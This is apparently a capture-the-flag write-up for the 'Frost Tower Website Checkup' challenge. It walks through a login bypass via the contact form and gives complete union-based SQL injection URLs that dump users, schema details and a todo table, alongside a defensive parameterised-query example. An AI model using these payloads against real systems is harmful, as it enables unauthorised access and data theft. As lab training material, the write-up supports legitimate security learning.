12) Frost Tower Website Checkup


Details

  • Location: FrostFest/Jack's Studio
  • Troll: Ingreta Tude
  • Objective Link 1: Link
  • Objective Link 2: Link
  • github files: Link


Troll's Objective Message

Hey there! I’m Ingreta Tude.

I really don’t like the direction Jack Frost is leading us. He seems obsessed with beating Santa and taking over the holiday season. It just doesn’t seem right. Why can’t we work together with Santa and the elves instead of trying to beat them? But, I do have an Objective for you. We’re getting ready to launch a new website for Frost Tower, and the big guy has charged me with making sure it’s secure. My sister, Ruby Cyster, created this site, and I don’t trust the results. Can you please take a look at it to find flaws? Here is the source code if you need it. Oh wow - I thought we left SQL injection in the last decade. Thanks for your help finding this!

The terminal challenge for this objective is the terminal "Elf Code Python" offered by Ribb Bonbowford. Solving this terminal challenge provides additional hints for this objective. To view the hints use the menu on the left.

To start this objective click on the "Frost Tower Website Checkup" terminal next to Ingreta Tude. This will open up this website.

After opening the above website, open the Firefox developer tools and go to the Network tab.

On the website, type a random email address into the subscribe field and press submit. The Network tab in the developer tools shows the HTTP request and its headers for this submission.

The response is coming from the site https://staging.jackfrosttower.com/testsite.

By reviewing the source code of the Frost Tower website you can find a login bypass and a SQL injection (SQLi) vulnerability.

The login bypass vulnerability is in the /postcontact endpoint.

To verify authentication, the website endpoints check for a session.uniqueID. The /postcontact endpoint (the contact form handler) sets session.uniqueID if the submitted email address was already submitted before.

To bypass authentication, submit the same email address twice in the contact form.

Open the above website in Firefox, https://staging.jackfrosttower.com/testsite.

Click the Contact link at the top right.

Enter and save the same email address twice to bypass the login.

Click the Dashboard link to view the dashboard.

The SQL injection vulnerability is found in the /detail/:id endpoint.


The call to m.raw() marks the id value as raw SQL, so the .escape() function no longer escapes it. The endpoint accepts multiple contact IDs in one request (e.g. https://staging.jackfrosttower.com/detail/199,200,201), and the SQLi payload is sent in place of that comma-separated ID list. The SQLi URLs look as follows.
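As an added example that is not part of the Frost Tower code, the following JavaScript shows how the /detail/:id lookup could be hardened: validate each comma-separated value as a plain integer and hand the values to the driver as query parameters instead of wrapping them in m.raw(). The contacts table name, the split-on-comma behaviour and the helper names are assumptions.

```javascript
// Added example (not the Frost Tower site's own code): a hardened id-list
// handler for a /detail/:id style endpoint. Values are validated and passed
// as parameters, so nothing the user sends is ever spliced into the SQL text.

// Parse "199,200,201" into an array of integers; reject anything else.
function parseIdList(param) {
  if (typeof param !== 'string' || param.length === 0 || param.length > 256) {
    throw new Error('invalid id parameter');
  }
  const ids = [];
  for (const part of param.split(',')) {
    // Only plain decimal integers pass; "199 union select ..." fails here,
    // as does an empty trailing element produced by a trailing comma.
    if (!/^[0-9]{1,10}$/.test(part)) {
      throw new Error(`invalid contact id: ${JSON.stringify(part)}`);
    }
    ids.push(Number(part));
  }
  return ids;
}

// Build a parameterised query: one "?" placeholder per id, with the values
// returned separately for connection.query(sql, params) style drivers.
// The table name "contacts" is an assumption.
function buildDetailQuery(param) {
  const ids = parseIdList(param);
  const placeholders = ids.map(() => '?').join(', ');
  return {
    sql: `SELECT * FROM contacts WHERE id IN (${placeholders})`,
    params: ids,
  };
}

// Route-handler friendly wrapper: null means "reject the request with 400".
function safeDetailQuery(param) {
  try {
    return buildDetailQuery(param);
  } catch (e) {
    return null;
  }
}
```

With this in place the injected payloads below are rejected before any query is built, while the legitimate 199,200,201 form still works.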

To get a list of all users by SQLi, visit the following URL:

SQLi to get all users

    https://staging.jackfrosttower.com/detail/199%20union select * from users --,

We can't send commas in the SQLi request. To find all the table names you will need to replace the commas with a longer expression.

Run the following SQLi to get all the table names:

SQLi to get all the table names

    https://staging.jackfrosttower.com/detail/199%20union select * from ((select 9999)A join (select table_name from information_schema.tables)B join (select null)C join (select null)D join (select null)E join (select null)F join (select null)G) --,

From the results of the above SQLi you see there is a table called todo.

Run the following SQLi three times, with offset 0, 1 and 2, to get the three column names:

SQLi to get column names for todo table

    https://staging.jackfrosttower.com/detail/199%20union select * from ((select 9999)A join (SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'todo' ORDER BY ordinal_position LIMIT 1 offset 2)B join (select null)C join (select null)D join (select null)E join (select null)F join (select null)G) --,

From the results of the above SQLi you see the table todo has three columns: id, note and completed.

Run the following SQLi to get the contents of the todo table:

SQLi to get the three columns of todo table

    https://staging.jackfrosttower.com/detail/199%20union select * from ((select 9999)A join (SELECT note FROM todo)B join (select completed from todo)C join (select id from todo)D join (select null)E join (select null)F join (select null)G) --,

From the results of the above SQLi you see one of the notes that says:

    With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him

Answer

clerk